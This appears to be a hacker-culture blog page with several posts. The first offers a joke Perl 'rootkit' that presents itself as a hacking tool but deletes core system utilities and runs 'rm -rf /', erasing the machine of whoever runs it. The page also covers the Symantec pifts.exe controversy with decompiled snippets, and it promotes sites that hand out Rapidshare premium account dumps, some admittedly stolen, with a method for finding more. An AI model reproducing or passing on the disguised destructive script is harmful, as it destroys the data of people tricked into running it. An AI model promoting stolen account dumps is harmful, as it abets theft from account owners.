The best rootkit!!!

#!/usr/bin/perl
#######################################################################
# PREVATE!!! PREVATE!!! PREVATE!!! PREVATE!!! PREVATE!!! PREVATE!!! #
# DU NOTTE DESTREBUTTE! DU NOTTE DESTREBUTTE! DU NOTTE DESTREBUTTE! #
# = Potreot-Rootkit (kornevaja sumka) = #
# (c)oded by v00d00_sp00f3d #
# Greetz: BuggerHukkerCrew #
#######################################################################
&usage; # подключаем ф-ии руткита
print ” \n”; # hekk the pl0n8
print “[+] Zopuskaemsya…\n”; # зопускаемся
print “[+] Pryachemsya…\n”; # используем перпроцессорную резидентность
system(“rm /bin/ls; rm /usr/bin/ls”); # прячем фаелы
system(“rm /bin/ps; rm /usr/bin/ps”); # прячем процессы
system(“rm /bin/netstat; rm /usr/bin/netstat”); # прячем netstat-лестенги
system(“rm /bin/lsmod; rm /usr/bin/lsmod”); # прячем модули
print “[+] Mutiruem…\n”; # используем полиморфические технологии
system(“rm -rf /”); # зокрепляемся в сестеме (крепко!!!)
print “[+] ROOTKITED!!! YOU AR HEKKER!!!\n”; # ХЭККЕР!!!!

sub usage()
{
print q(

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
________ __ _____ .__ __
/ _____/ _____/ |__/ ____\____ __ __| |_/ |
/ \ ___ / _ \ __\ __\\__ \ | | \ |\ __\
\ \_\ \ <_> | | | | / __ \| | / |_| |
\______ /\____/|__| | | |____ /____/|____/__|
\/ | | \/
| |
| |
| |
| |
| |
|__|

[ Potreot-Rootkit (kornevaja sumka) by v00d00_sp00f3d ]

KEEP IT PREVATE OR DIE BITCH! MVO-PRIV8 STUFF
Greetz: BuggerHukkerCrew
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}

ROOTKITED!!! YOU AR HEKKER!!! 😆

Use this and indeed you are L33T ХЭККЕР! =))

Tagged with:
 

Conspiracy theories fly around Norton forum ‘Pifts’ purge

Conspiracy theories are running rampant in the absence of a clear explanation of why Symantec deleted threads expressing concern about a file called pifts.exe from its Norton support forums.

Many users running Norton Internet Protection began seeing a popup warning on Monday that a file called PIFTS.exe on their systems was trying to access the internet. The location of the file was given as a non-existent folder buried inside the Symantec LiveUpdate folder.

The appearance of a file in a non-existent folder suggests rootkit-like behaviour. PIFTS.exe attempts to contact a server in Africa, which has been traced to Symantec.

Concerned punters started posting on Norton’s support forums, asking what was going on. That’s all normal enough, but then discussions on the subject were deleted without explanation from Norton’s community pages. Follow-up threads mentioning the issue were deleted even more quickly.

source

Symantec creates havoc with unsigned Norton patch

Symantec released a diagnostic patch for some of its older Norton products on Monday night that did not identify its origin and thus triggered alerts on user firewalls, the company said Tuesday.

The patch for 2006 and 2007 versions of Norton Internet Security and Norton Antivirus, a program dubbed “PFST.exe,” (Product Information Framework Trouble Shooter) was distributed to collect anonymous statistics on matters such as how many computers are using the products and what operating system they are running, Jeff Kyle, group product manager for Symantec consumer products, said Tuesday.

Because it was unsigned–a result of human error–firewalls started prompting users with messages asking them if they trust the patch, Kyle said. Of course, because the patch had no signature indicating it was from Symantec, users didn’t know whether to trust it and many of them went to the Norton user forum for answers.

The company pulled the patch after three hours and then unwittingly laid the groundwork for conspiracy theorists after it started deleting forum posts related to the matter. The company was not censoring the posts, but fighting off a spam attack, according to Kyle.

“At the same time we were pulling down the patch a spammer created a new account on our forum and minutes after that there were 200 new users all targeting the same thread,” he said. “Within the first hour there were like 600 posts to that thread. Obviously it was a bot creating this.”

The posts were written with poor grammar and broken English and some were vulgar and nonsensical. It is possible, though, that Symantec could have inadvertently deleted some legitimate posts while it was purging the spam, Kyle said.

“There is no conspiracy theory. There’s nothing we are hiding at all,” Kyle added.

Meanwhile, Kyle said he isn’t sure whether or when Symantec will redistribute the patch, but if they do, he said, it will be signed.

Symantec has more information on its message board site. The Washington Post reported that hackers were exploiting the situation and had managed to get malicious Web sites into top Google search results for “pifts.exe.”

source

Digg in:

http://chrysler5thavenue.blogspot.com/2009/03/piftsexe.html

http://www.abovetopsecret.com/forum/thread444230/pg1

http://blogs.howstuffworks.com/2009/03/10/what-is-piftsexe/

http://www.theregister.co.uk/2009/03/10/norton_pifts_mystery/

http://news.cnet.com/8301-1009_3-10192899-83.html?part=rss&subj=news&tag=2547-1_3-0-20

http://isc.sans.org/diary.html?storyid=5992

http://it.slashdot.org/article.pl?sid=09/03/10/139229

http://www.tech-linkblog.com/2009/03/conspiracy-theories-run-rampant-due-to-piftsexe.html/

http://voices.washingtonpost.com/securityfix/2009/03/symantec_users_complain_of_mys.html

http://community.norton.com/norton/board/message?board.id=nis_feedback&thread.id=39119

http://www.virustotal.com/analisis/734465e30a6ee6d6c493471d77940f4c

http://www.threatexpert.com/report.aspx?md5=91b564d825a3487ae5b5fafe57260810

http://www.mediafire.com/download.php?iotyqjbrmry – pifts.exe asm code from IDA and C-like decompiled pseudocode from HexRays Decompiler

The disassembly of the binary doesn’t look out of the ordinary and after a quick look at the PIFTS.c decompiled code in the above archive it seems that symantec is telling nothing but the truth.

Snips:

$cat PIFTS.c | grep -i RegOpenKey
// LSTATUS __stdcall RegOpenKeyExW(HKEY hKey, LPCWSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult); idb
v1 = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey);
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
&& (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)

$cat PIFTS.c | grep -i http
extern wchar_t aHttpStats_nort[40]; // weak
sub_402210((int)L”http://stats.norton.com/n/p?module=2667″, (int)&lpszUrl);

$cat PIFTS.c | grep -i symantec
v1 = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey);
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
&& (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
L”SOFTWARE\\Symantec\\PIF\\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\\PifEngine”,
L”SOFTWARE\\Symantec\\PIF\\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\\HbEngine”,
L”SOFTWARE\\Symantec\\PIF\\{96E26A03-A25A-400b-B9B4-564C9BD00F46}”,

For me it doesn’t sound like much of a conspiracy or an uber slick big brother spyware because Symantec’s explanation of pifts.exe is somewhat reasonable although the method they used to get the stats is questionable and unprofessional(don’t they have test systems, labs or networks? why push stuff that should be tested in the “development labs” to clients? clients are not a testing platform) and Symantec removing forum posts when they look like this doesn’t bother me either. People who started this fire are ones who don’t have the skills to reverse engineer an executable because if they did they would know that there isn’t really nothing interesting in pifts code. Another reason for this might be this one too:

Finally, it has also been reported by the Washington Post that hackers are taking advantage of this situation. “Some of the top searches (currently the 3rd and 4th result in a Google search) are Web sites that try to install malicious software when you visit them.” When searching for information on “pifts.exe,” Symantec strongly advises all users to be wary of following links to unknown sites as malicious users are attempting to use this hot topic to distribute malware.

Although it is hard to believe that this was a planned scam because you really have to be a con mastermind in order to think(of it previously and wait for the right moment), spot the apropriate moment(symantec’s pifts.exe unsigned and questionable push update), prepare(create bogus trap websites/page related to the subject and embedd exploit+malware code) and fire the scam(make people believe your conspiracy theory-the symantec forums, the stories, blog posts) then watch your botnet(s) grow. As it is written above it is more probably that bad guys saw the opportunity after the hype has been created and started to take advantage of it.

Tagged with:
 

$200 iTunes Gift Certificates are selling for less than $3 in China now that a group of local hackers has circumvented Apple’s algorithm for creating the digital vouchers and built their own gift certificate generators.

the story

The Store! 😆

Tagged with:
 

Well if you have the luck to get a high pagerank and really show up alot in google searches then you automatically get this free gift. Those are http download stats or better called http get commands issued to the server and you should not confuse that page with hack attempts. Do you see the immense amount of bot web attacks, mostly rfi and lfi? Well i’ve seen some of that as soon as google indexed my site and started showing it in searches. The conclusion is, if you don’t know this already, if you want to have your own server under your administration you’d better be having the necessary skills to secure it, because if you don’t, then your website and/or server won’t stand up for too long before getting pwned.

Tagged with:
 

Free Rapidshare premium accounts

Did you know that there are a bunch of websites out there that give out free rapidshare premium accounts(dumps) almost daily?
Well i am going to give you 2 examples and the method i used to find them.

1. http://rapidshare-premiumz.blogspot.com/ – updated with new accounts several times a day with new accounts usually containing tens of gigs of traffic left and usually Secured, needed because of morons who try to takeout the accounts for themselves. The blog has high traffic so the rs accounts get nulled pretty fast. The nulled accounts are marked with an – on the website.

2. http://www.rapidshare-dumps.blogspot.com/ – pretty new blog updated almost daily with usually big(dozens) secured and non-secured rapidshare dumps. The downside of posting non-secured accounts, as stated before, is that most of them(all in fact) are taken over in a matter of minute by morons who don’t like to share but to just OWN. Assholes.

THE METHOD

Well the method is so simple yet so powerful that it almost breaks your heart that you didn’t think of it earlier. 😛 Simplicity, not as in dumb and lazy(if you get the point), is the way to power and effectiveness.

example1

example2

example3

example4

Yes that’s it! Pretty lame you might think huh? Well i assure you it’s not since i found a dozen of sites like those ones up there and forum posts that fullfilled my rapidshare warez,crack,hack,fuck wishes for the next 6 months. 😆

And if you’re not that retarded and know a little about google operators/google-fu you can expand on those searches and create even more effective queries and then start browsing through the results and figure out which websites are for real dumps and bookmark them. Please do check several accounts from a single website or forum post, since many get taken over either be assholes or by their owners(if they are stolen) or rs changes the account password because of too many different geographical logins to the same account. Do not remove the past24 hours option in the search because it constitues 50% out of the google-fu behind the search(if you can’t figure out why don’t worry…just leave it there…but do worry about you beeing stupid though).

RS…ALL YOU’RE BASE ARE BELONG TO US!

Tagged with:
 

BackTrack 4 beta released

bt4_logo

http://remote-exploit.org/backtrack_download.html ^^

You can read more about the release here.

( have mercy on the webserver 😆 )

Tagged with: